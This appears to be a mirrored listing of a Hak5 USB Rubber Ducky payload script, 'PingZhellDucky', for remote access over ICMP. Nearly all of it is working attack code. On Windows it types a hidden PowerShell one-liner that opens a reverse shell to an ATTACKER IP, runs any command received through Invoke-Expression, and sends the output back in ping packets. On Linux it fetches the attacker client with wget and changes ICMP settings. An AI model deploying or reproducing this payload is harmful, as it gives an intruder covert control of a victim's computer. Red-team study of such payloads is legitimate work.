Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/remote_access/PingZhellDucky/payload.txt
2964 views
1
REM PingZhellDucky

2
REM Version 1.2

3
REM OS: Windows & Unix

4
REM Author: 0i41E

5
REM Requirements: DuckScript 3.0, Perl

6


7
REM       Getting remote access via ICMP or perform the required setup

8


9
REM PASSIVE_WINDOWS_DETECT extension, made by Korben, to indentify the OS

10
EXTENSION PASSIVE_WINDOWS_DETECT

11
    REM VERSION 1.0

12


13
    REM Windows fully passive OS Detection and passive Detect Ready

14
    REM Includes its own passive detect ready. Does not require

15
    REM additional extensions

16


17
    REM USAGE:

18
    REM Extension runs inline (here)

19
    REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic

20
    REM boot delay

21
    REM $_OS will be set to WINDOWS or NOT_WINDOWS

22


23
    REM CONFIGURATION:

24
    DEFINE MAX_WAIT 150

25
    DEFINE CHECK_INTERVAL 20

26
    DEFINE WINDOWS_HOST_REQUEST_COUNT 2

27
    DEFINE NOT_WINDOWS 7

28


29
    VAR $MAX_TRIES = MAX_WAIT

30
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))

31
        DELAY CHECK_INTERVAL

32
        $MAX_TRIES = ($MAX_TRIES - 1)

33
    END_WHILE

34
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN

35
        $_OS = WINDOWS

36
    ELSE

37
        $_OS = NOT_WINDOWS

38
    END_IF

39


40
    REM EXAMPLE USAGE AFTER EXTENSION

41
    REM IF ($_OS == WINDOWS) THEN

42
    REM     STRING HELLO WINDOWS!

43
    REM ELSE

44
    REM     STRING HELLO WORLD!

45
    REM END_IF

46
END_EXTENSION

47


48
REM Configure your settings below:

49
REM Insert the attacking IP between ''

50
DEFINE ATTACKER '0.0.0.0'

51
REM Set the default DELAY

52
DEFINE WAIT 250

53
REM Do you want to install the dependencies and set up the infratructre?

54
REM Will trigger when not using Windows - Best use with Linux

55
DEFINE INSTALL TRUE

56
REM Link to the PingZhellDucky.pl client - Required for installation

57
DEFINE CLIENTLINK https://raw.githubusercontent.com/0i41E/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl

58


59


60
IF ($_OS == WINDOWS) THEN

61
    DELAY 1500

62
    GUI r

63
    DELAY 500

64
    STRINGLN powershell -NoP -NonI -w h

65
    DELAY 500

66
    STRING ;$Delay=5;$BufferSize=128;$ICMPDucky=New-Object System.Net.NetworkInformation.Ping;$PingDuck=New-Object System.Net.NetworkInformation.PingOptions;$PingDuck.DontFragment = $True;$QuackAttack = ([text.encoding]::ASCII).GetBytes('Ducky@PS '+(gl).Path+'> ');$ICMPDucky.Send( ATTACKER ,60 * 1000, $QuackAttack, $PingDuck) | Out-Null;while ($true){$QuackAttack=([text.encoding]::ASCII).GetBytes('');$reply=$ICMPDucky.Send( ATTACKER ,60 * 1000, $QuackAttack, $PingDuck);if ($reply.Buffer){$response=([text.encoding]::ASCII).GetString($reply.Buffer);$result=(IeX -Command $response 2>&1 | Out-String );$QuackAttack = ([text.encoding]::ASCII).GetBytes($result);$index=[math]::floor($QuackAttack.length/$BufferSize);$i = 0;

67
    DELAY WAIT

68
    STRINGLN if($QuackAttack.length -gt $BufferSize){while ($i -lt $index ){$NGGYU2 = $QuackAttack[($i*$BufferSize)..(($i+1)*$BufferSize-1)];$ICMPDucky.Send( ATTACKER ,60 * 10000, $NGGYU2, $PingDuck) | Out-Null;$i +=1;};$remainingindex=$QuackAttack.Length % $BufferSize;if($remainingindex -ne 0){$NGGYU2 = $QuackAttack[($i*$BufferSize)..($QuackAttack.Length)];$ICMPDucky.Send( ATTACKER ,60 * 10000, $NGGYU2, $PingDuck) | Out-Null}}else{$ICMPDucky.Send( ATTACKER ,60 * 10000, $QuackAttack, $PingDuck) | Out-Null};$QuackAttack = ([text.encoding]::ASCII).GetBytes("`nDucky@PS " + (pwd).Path + '> ');$ICMPDucky.Send( ATTACKER ,60 * 1000, $QuackAttack, $PingDuck) | Out-Null}else{Start-Sleep -Seconds $Delay}}

69
ELSE

70
    IF INSTALL THEN

71
        DELAY WAIT

72
        STRINGLN echo "Setting up Infrastructre - Do not interact!"

73
        DELAY 2000

74
        STRINGLN cpan IO::Socket NetPacket::IP NetPacket::ICMP && wget CLIENTLINK && sysctl -w net.ipv4.icmp_echo_ignore_all=1 && echo "Setup complete!"

75
    ELSE

76
        STRING Please insert device into a Windows machine or change the settings!

77
END_IF

78
END_IF

79


80